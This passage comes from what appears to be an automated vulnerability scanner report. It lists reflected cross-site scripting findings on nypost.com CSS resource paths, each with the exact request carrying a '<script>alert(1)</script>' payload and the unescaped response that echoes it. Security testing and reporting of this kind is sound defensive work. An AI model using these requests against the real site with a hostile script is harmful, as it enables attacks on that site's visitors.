User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.186. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff08<script>alert(1)</script>577eb990e51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.187. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9da4<script>alert(1)</script>551afe08244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css</p>
...[SNIP]...

1.188. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d11b<script>alert(1)</script>5def719c2ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css</p>
...[SNIP]...

1.189. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8933b<script>alert(1)</script>9d642fdaca7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css</p>
...[SNIP]...

1.190. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b1b03<script>alert(1)</script>aa44ba2121a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a</p>
...[SNIP]...

1.191. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5b4a<script>alert(1)</script>720f93d37d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.192. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f621<script>alert(1)</script>e9834c5b54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.193. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c85fd<script>alert(1)</script>b5f9d728c50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.194. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73d80<script>alert(1)</script>f874c57cf69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.195. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f36a<script>alert(1)</script>d8e3415c99f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css</p>
...[SNIP]...

1.196. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d74f<script>alert(1)</script>4103bd751f4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4</p>
...[SNIP]...

1.197. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88c89<script>alert(1)</script>690a4345437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.198. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98f73<script>alert(1)</script>9a7b5d8e3b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.199. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce062<script>alert(1)</script>a6eac44dde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css</p>
...[SNIP]...

1.200. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3920<script>alert(1)</script>d04ffc14596 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css</p>
...[SNIP]...

1.201. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d00<script>alert(1)</script>aa71840f4bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css</p>
...[SNIP]...

1.202. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 42583<script>alert(1)</script>da97e745c86 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86</p>
...[SNIP]...

1.203. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9270c<script>alert(1)</script>7f4bc085917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
